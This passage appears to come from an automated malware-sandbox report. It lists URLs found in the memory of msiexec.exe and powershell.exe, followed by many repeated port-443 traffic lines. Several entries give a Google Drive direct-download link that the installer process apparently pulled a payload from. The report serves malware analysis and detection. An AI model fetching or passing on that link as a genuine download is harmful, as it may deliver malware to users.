      Source: msiexec.exe, 00000007.00000003.2014166945.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2109556504.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2026931955.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2245474853.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2450327813.000000000636B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2484899489.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2098333838.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2132210940.000000000632C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
      Source: msiexec.exe, 00000007.00000003.2038099809.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2665098123.00000000062BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download6
      Source: msiexec.exe, 00000007.00000003.1942597274.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1964751327.000000000632D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1942630171.000000000632C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=downloadUA
      Source: msiexec.exe, 00000007.00000002.2665098123.00000000062BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=downloada
      Source: msiexec.exe, 00000007.00000002.2665098123.00000000062FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=downloadm
      Source: msiexec.exe, 00000007.00000003.1836071609.0000000006317000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2665098123.0000000006317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=downloadn
      Source: powershell.exe, 00000002.00000002.1770102180.0000000005196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000002.00000002.1773304254.00000000060A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: msiexec.exe, 00000007.00000003.2121365456.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2576873422.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2188890243.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1892444748.000000000632D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2121435337.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2416969426.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2199911065.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1869479461.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2302731731.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2038099809.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1812068844.0000000006369000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1880918653.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2177430587.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2541790545.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2359079547.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2026978710.0000000006327000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2222371219.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2518241517.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2336581381.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2211383777.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2013685534.0000000006372000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
      Source: msiexec.exe, 00000007.00000003.2121365456.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2576873422.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2188890243.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2132126515.000000000636B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1892444748.000000000632D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2416969426.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2199911065.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1869479461.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2268033915.000000000636B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2302731731.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1812068844.0000000006369000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1880918653.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2177430587.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2541790545.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2290560307.000000000636B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2359079547.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2026931955.000000000636B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2222371219.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2518241517.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2336581381.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2428136172.000000000636B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
      Source: msiexec.exe, 00000007.00000003.1964751327.000000000632D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_
      Source: msiexec.exe, 00000007.00000003.2121365456.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2576873422.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2188890243.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2132126515.000000000636B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2472769545.000000000636B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1892444748.000000000632D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2416969426.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2199911065.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1869479461.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2268033915.000000000636B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2302731731.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1812068844.0000000006369000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1880918653.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1942449247.000000000636B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2177430587.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2541790545.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2290560307.000000000636B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2359079547.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2026931955.000000000636B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2222371219.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2518241517.0000000006372000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
      Source: msiexec.exe, 00000007.00000003.2121365456.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2576873422.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2188890243.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2132126515.000000000636B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1892444748.000000000632D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2416969426.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2199911065.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1869479461.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2268033915.000000000636B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2302731731.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1812068844.0000000006369000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1880918653.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2177430587.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2541790545.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2290560307.000000000636B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2359079547.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2026931955.000000000636B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2222371219.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2518241517.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2336581381.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2428136172.000000000636B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
      Source: msiexec.exe, 00000007.00000003.2121365456.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2576873422.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2188890243.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1892444748.000000000632D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2121435337.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2416969426.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2199911065.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1869479461.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2302731731.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2038099809.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1812068844.0000000006369000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1880918653.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2177430587.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2541790545.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2359079547.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2026978710.0000000006327000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2222371219.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2518241517.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2336581381.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2211383777.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2013685534.0000000006372000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
      Source: msiexec.exe, 00000007.00000003.2121365456.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2576873422.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2188890243.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1892444748.000000000632D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2121435337.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2416969426.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2199911065.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1869479461.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2302731731.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2038099809.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1812068844.0000000006369000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1880918653.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2177430587.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2541790545.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2359079547.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2026978710.0000000006327000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2222371219.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2518241517.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2336581381.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2211383777.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2013685534.0000000006372000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: msiexec.exe, 00000007.00000003.2121365456.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2576873422.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2188890243.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1892444748.000000000632D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2121435337.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2416969426.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2199911065.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1869479461.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2302731731.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2038099809.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1812068844.0000000006369000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1880918653.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2177430587.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2541790545.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2359079547.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2026978710.0000000006327000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2222371219.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2518241517.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2336581381.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2211383777.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2013685534.0000000006372000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: msiexec.exe, 00000007.00000003.2121365456.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2576873422.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2188890243.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1892444748.000000000632D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2121435337.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2416969426.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2199911065.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1869479461.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2302731731.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2038099809.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1812068844.0000000006369000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1880918653.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2177430587.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2541790545.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2359079547.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2026978710.0000000006327000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2222371219.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2518241517.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2336581381.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2211383777.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2013685534.0000000006372000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
      Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
